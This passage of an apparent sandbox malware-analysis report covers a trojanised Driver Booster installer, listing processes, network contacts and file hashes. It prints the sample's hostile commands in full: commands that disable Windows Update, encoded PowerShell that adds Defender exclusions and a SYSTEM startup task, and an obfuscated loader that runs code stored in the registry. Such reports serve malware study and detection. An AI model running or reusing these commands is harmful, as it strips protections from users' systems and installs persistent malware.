| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\lrucache.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\lrucache.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-TIEOM.tmp-dbinst\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-TIEOM.tmp-dbinst\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-TIEOM.tmp-dbinst\setup.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe
"C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe"
C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe
"C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe"
C:\Users\Admin\AppData\Local\Temp\lrucache.exe
"C:\Users\Admin\AppData\Local\Temp\lrucache.exe"
C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe
"C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe"
C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp" /SL5="$9017E,28225140,139264,C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AbgBrAGQAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB0AHgAeAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB3AHEAYwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAGoAIwA+AA=="
C:\Users\Admin\AppData\Local\Temp\is-TIEOM.tmp-dbinst\setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-TIEOM.tmp-dbinst\setup.exe" "C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe" /title="Driver Booster 10" /dbver=10.4.0.128 /eula="C:\Users\Admin\AppData\Local\Temp\is-TIEOM.tmp-dbinst\EULA.rtf" /showlearnmore /pmtproduct /nochromepmt
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
sc stop UsoSvc
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\system32\sc.exe
sc stop wuauserv
C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
sc stop bits
C:\Windows\system32\sc.exe
sc stop dosvc
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAbQAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsACcAIAAtAEEAcgBnAHUAbQBlAG4AdAAgACcALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAiAFAAQQBBAGoAQQBIAFkAQQBjAHcAQQBqAEEARAA0AEEASQBBAEIAVABBAEgAUQBBAFkAUQBCAHkAQQBIAFEAQQBMAFEAQgBRAEEASABJAEEAYgB3AEIAagBBAEcAVQBBAGMAdwBCAHoAQQBDAEEAQQBMAFEAQgBHAEEARwBrAEEAYgBBAEIAbABBAEYAQQBBAFkAUQBCADAAQQBHAGcAQQBJAEEAQQBuAEEARQBNAEEATwBnAEIAYwBBAEYAVQBBAGMAdwBCAGwAQQBIAEkAQQBjAHcAQgBjAEEARwA4AEEAYwBBAEIAbABBAEgASQBBAFkAUQBCAGMAQQBFAEUAQQBjAEEAQgB3AEEARQBRAEEAWQBRAEIAMABBAEcARQBBAFgAQQBCAE0AQQBHADgAQQBZAHcAQgBoAEEARwB3AEEAWABBAEIAVQBBAEcAVQBBAGIAUQBCAHcAQQBGAHcAQQBZAGcAQgBqAEEARABNAEEATwBRAEEAdwBBAEQASQBBAFoAQQBBADQAQQBEAEUAQQBNAHcAQQB5AEEARwBZAEEATgBBAEEAegBBAEcAVQBBAE0AdwBCAGgAQQBHAFUAQQBNAEEAQQA0AEEARABZAEEAWQBRAEEAdwBBAEQAQQBBAE8AUQBBADUAQQBEAGMAQQBPAFEAQgBtAEEARwBFAEEATwBBAEEANABBAEYAdwBBAFYAdwBCAEQAQQBFAE0AQQBUAGcAQgBoAEEASABRAEEAYQBRAEIAMgBBAEcAVQBBAFMAQQBCAHYAQQBIAE0AQQBkAEEAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAHQAQQBGAFkAQQBaAFEAQgB5AEEARwBJAEEASQBBAEIAUwBBAEgAVQBBAGIAZwBCAEIAQQBIAE0AQQBJAEEAQQA4AEEAQwBNAEEAZAB3AEIANQBBAEgARQBBAEkAdwBBACsAQQBBAD0APQAiACcAKQAgADwAIwBvAHMAdwBzACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAaAB5AGIAdgAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAGYAeQBjACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBEAEIAYQBzAHMAaQBzAHQAYQBuAHQAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwBhAGQAZwBxACMAPgA7ACAAQwBvAHAAeQAtAEkAdABlAG0AIAAnAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAVwBDAEMATgBhAHQAaQB2AGUAVQBwAGQAYQB0AGUALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFUAcwBlAHIAcwBcAG8AcABlAHIAYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYgBjADMAOQAwADIAZAA4ADEAMwAyAGYANAAzAGUAMwBhAGUAMAA4ADYAYQAwADAAOQA5ADcAOQBmAGEAOAA4AFwAVwBDAEMATgBhAHQAaQB2AGUASABvAHMAdAAuAGUAeABlACcAIAAtAEYAbwByAGMAZQAgADwAIwBtAGMAZQAjAD4AOwAgAFMAdABhAHIAdAAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAA8ACMAdQBkAG4AeQAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcARABCAGEAcwBzAGkAcwB0AGEAbgB0ACcAOwA="
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{0bfb6594-2045-438a-a5c3-bc91e2af0f2c}
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHYAcwAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFUAcwBlAHIAcwBcAG8AcABlAHIAYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYgBjADMAOQAwADIAZAA4ADEAMwAyAGYANAAzAGUAMwBhAGUAMAA4ADYAYQAwADAAOQA5ADcAOQBmAGEAOAA4AFwAVwBDAEMATgBhAHQAaQB2AGUASABvAHMAdAAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAdwB5AHEAIwA+AA=="
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | f0854165.xsph.ru | udp |
| RU | 141.8.193.236:80 | f0854165.xsph.ru | tcp |
| US | 8.8.8.8:53 | 11.2.37.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.193.8.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | update.iobit.com | udp |
| US | 152.199.20.140:80 | update.iobit.com | tcp |
| US | 152.199.20.140:80 | update.iobit.com | tcp |
| US | 152.199.20.140:80 | update.iobit.com | tcp |
| US | 152.199.20.140:80 | update.iobit.com | tcp |
| US | 152.199.20.140:80 | update.iobit.com | tcp |
| US | 152.199.20.140:80 | update.iobit.com | tcp |
| US | 152.199.20.140:80 | update.iobit.com | tcp |
| US | 8.8.8.8:53 | 140.20.199.152.in-addr.arpa | udp |
| US | 152.199.20.140:80 | update.iobit.com | tcp |
| US | 152.199.20.140:80 | update.iobit.com | tcp |
Files
memory/3952-0-0x0000000000400000-0x00000000022FF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe
| MD5 | ccc48304afa2e7c58492babc297db8a4 |
| SHA1 | decd98730cf34e1567965f6fb7085569fc1053e8 |
| SHA256 | e02061a4626f950b41d89c21e9a780f8aee5c5ddda7880b753d660db09117910 |
| SHA512 | 79bd4dda233b714ecd6746c5f78f9d441852e333202fc74da6430d23d7dc1deadebb5a5608da63ac63ee0891a99ee259d3498d58ac59621226d8bf7862de4b04 |
C:\Users\Admin\AppData\Local\Temp\lrucache.exe
| MD5 | 6a4308bc229b64cf5bc6d359056b8980 |
| SHA1 | 29f6484fafd50f0c00b5be01d97e82ffeda6f75b |
| SHA256 | 5d6c06c7b142cf4e07d354d2b96bcf5c0c413aa0578527ac5e329f1e78ce7bd7 |
| SHA512 | f4fb4b336a01ccff7bf527f8986098ea57100c3f367a6119515c73dd910fdbaf42c3401d624229a0fbbc85f57a36b889b681227f7f6d186b1aaa0100ea3b7364 |
memory/1096-84-0x0000000000400000-0x000000000042C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe
| MD5 | 0e31bfc197cf7557b6ba5c18ecb1e5b2 |
| SHA1 | 78ec7c8f28568611cf524f30b67875e031a09cb2 |
| SHA256 | 87890cb7476446f228fe1edaf236bd4e02d0f6372805a309bf2773ec64737d78 |
| SHA512 | 700b21c7be3d558970c137cded2e6079b5f2d5ce12495c576a281d210f32c3de3b0369bcfefcf7f666465498c6010c7d33001c098bbe08c2a2f23c10ff67a2e0 |
memory/3608-169-0x00000000009E0000-0x0000000000C94000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp
| MD5 | 68b52a0b8e3d45bf3b520a0e7f16dad1 |
| SHA1 | e50408326eafb5ca8adc70db29c33b64e25bbbbd |
| SHA256 | b409d6d6f8896dc2afd1774479c741ca253c0e9b4732daaa08af84aa9c96888b |
| SHA512 | b8e0b486e2b9652831eb8efe48cf9575eef49204e827a64d69ae7c9c30304b2d98a66c28f1072fe8596847c15f13bbf7ec39d7708684ff64051bbae7ed063faf |
memory/3608-181-0x00007FF8CAE50000-0x00007FF8CB911000-memory.dmp
memory/1748-182-0x00000000007E0000-0x00000000007E1000-memory.dmp
memory/3608-186-0x000000001CB70000-0x000000001CE0A000-memory.dmp
memory/3608-187-0x0000000001B70000-0x0000000001B80000-memory.dmp
memory/3040-192-0x00007FF8CAE50000-0x00007FF8CB911000-memory.dmp
memory/3040-194-0x000001CFFDA30000-0x000001CFFDA40000-memory.dmp
memory/3040-193-0x000001CFFDA30000-0x000001CFFDA40000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tlisho2t.vpb.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3040-195-0x000001CFFD960000-0x000001CFFD982000-memory.dmp
memory/3040-208-0x00007FF8CAE50000-0x00007FF8CB911000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-TIEOM.tmp\EULA.rtf
| MD5 | b0381f0ba7ead83ea3bd882c1de4cd48 |
| SHA1 | c740f811623061595d76fce2ebb4e69d34316f3b |
| SHA256 | 44bc9472169403484a0d384f1ca81989ef7e4b07441758e8a0110078933cbcb5 |
| SHA512 | 6cfb8bc562d22843d043411720db97d0b4cbac96a20983d83d19e59b8428ec202f2532cc5af254438dc34fca4161abbd3f6bac8d397590e41b6d41e60700e78a |
C:\Users\Admin\AppData\Local\Temp\is-TIEOM.tmp-dbinst\setup.exe
| MD5 | 3d403676517f6a99de035a04dc3f3f82 |
| SHA1 | ed69d8f485374dfb58a5b651b1f3f1bab8ee9541 |
| SHA256 | 668f4f4ef277783cc66408d6631b63e9a24ffcd978834835fdb8fb2aa345a56e |
| SHA512 | 4ba6f75e9b518474bf9b846cda386bde0ca65233dd489b357b967e842af71ebca6e325b9fc9b8a0d1d775b16198ff31a6c2d2223797d2a3c490d5da001e8887e |
memory/1748-260-0x0000000000400000-0x0000000000531000-memory.dmp
memory/1096-262-0x0000000000400000-0x000000000042C000-memory.dmp
memory/3184-263-0x0000000000BC0000-0x0000000000BC1000-memory.dmp
memory/3184-340-0x0000000002680000-0x0000000002690000-memory.dmp
C:\ProgramData\IObit\iobitpromotion.ini
| MD5 | f3b25701fe362ec84616a93a45ce9998 |
| SHA1 | d62636d8caec13f04e28442a0a6fa1afeb024bbb |
| SHA256 | b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209 |
| SHA512 | 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84 |
C:\Users\Admin\AppData\Local\Temp\1713116766\ENGLISH.lng
| MD5 | 8e7f2723f0e72bc6abefca738c9c1ca4 |
| SHA1 | 969a4a6f31e146040a101d526886ede9a7c5c432 |
| SHA256 | f3c690feab9ab2b7dea8ea6334b484768f19caaf85dfa14be2bce5e4fdbffd4b |
| SHA512 | 9a3efa9dd002394050cbd457adb67121fcae7a31b66b42e3d612725b9166bd76c4f8c73ed039226c16248461c7f4f1fb6cac91960b7bb57a3273fbd022b1e232 |
memory/3608-363-0x0000000001B80000-0x0000000001B92000-memory.dmp
memory/3608-364-0x0000000001B60000-0x0000000001B66000-memory.dmp
memory/3940-365-0x0000000140000000-0x0000000140056000-memory.dmp
memory/3940-366-0x0000000140000000-0x0000000140056000-memory.dmp
memory/3940-367-0x0000000140000000-0x0000000140056000-memory.dmp
memory/3608-369-0x00007FF8CAE50000-0x00007FF8CB911000-memory.dmp
memory/3940-374-0x0000000140000000-0x0000000140056000-memory.dmp
memory/3940-380-0x0000000140000000-0x0000000140056000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
memory/4780-391-0x00007FF8CAE50000-0x00007FF8CB911000-memory.dmp
memory/4780-392-0x000001CC1F290000-0x000001CC1F2A0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 77d622bb1a5b250869a3238b9bc1402b |
| SHA1 | d47f4003c2554b9dfc4c16f22460b331886b191b |
| SHA256 | f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb |
| SHA512 | d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9 |
memory/4780-393-0x000001CC1F290000-0x000001CC1F2A0000-memory.dmp
memory/3608-395-0x0000000001B70000-0x0000000001B80000-memory.dmp
memory/5080-396-0x0000000003890000-0x00000000038C6000-memory.dmp
memory/5080-397-0x0000000072110000-0x00000000728C0000-memory.dmp
memory/5080-409-0x0000000003880000-0x0000000003890000-memory.dmp
memory/1160-407-0x000002C777C90000-0x000002C777CA0000-memory.dmp
memory/1160-410-0x000002C777C90000-0x000002C777CA0000-memory.dmp
memory/5080-408-0x0000000003F00000-0x0000000004528000-memory.dmp
memory/1160-411-0x00007FF8CAE50000-0x00007FF8CB911000-memory.dmp
memory/5080-412-0x0000000003E70000-0x0000000003E92000-memory.dmp
memory/5080-414-0x00000000047D0000-0x0000000004836000-memory.dmp
memory/5080-413-0x0000000004760000-0x00000000047C6000-memory.dmp
memory/4780-424-0x000001CC1F290000-0x000001CC1F2A0000-memory.dmp
memory/5080-425-0x0000000004940000-0x0000000004C94000-memory.dmp
memory/3184-426-0x0000000000BC0000-0x0000000000BC1000-memory.dmp
memory/5080-427-0x0000000004E00000-0x0000000004E1E000-memory.dmp
memory/5080-428-0x0000000004E40000-0x0000000004E8C000-memory.dmp
memory/1160-429-0x000002C77A060000-0x000002C77A0A0000-memory.dmp
memory/1160-430-0x00007FF8E9930000-0x00007FF8E9B25000-memory.dmp
memory/1160-431-0x00007FF8E8430000-0x00007FF8E84EE000-memory.dmp
memory/1080-432-0x0000000140000000-0x0000000140042000-memory.dmp
memory/1080-437-0x00007FF8E9930000-0x00007FF8E9B25000-memory.dmp
memory/1160-438-0x00007FF8CAE50000-0x00007FF8CB911000-memory.dmp
memory/1080-434-0x0000000140000000-0x0000000140042000-memory.dmp
memory/3184-441-0x0000000002680000-0x0000000002690000-memory.dmp
memory/1080-440-0x00007FF8E8430000-0x00007FF8E84EE000-memory.dmp
memory/3184-439-0x0000000000400000-0x0000000000A17000-memory.dmp
memory/1080-442-0x0000000140000000-0x0000000140042000-memory.dmp
memory/1080-433-0x0000000140000000-0x0000000140042000-memory.dmp
memory/4780-445-0x00007FF8CAE50000-0x00007FF8CB911000-memory.dmp
memory/3608-447-0x00007FF8CAE50000-0x00007FF8CB911000-memory.dmp
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
| MD5 | 556084f2c6d459c116a69d6fedcc4105 |
| SHA1 | 633e89b9a1e77942d822d14de6708430a3944dbc |
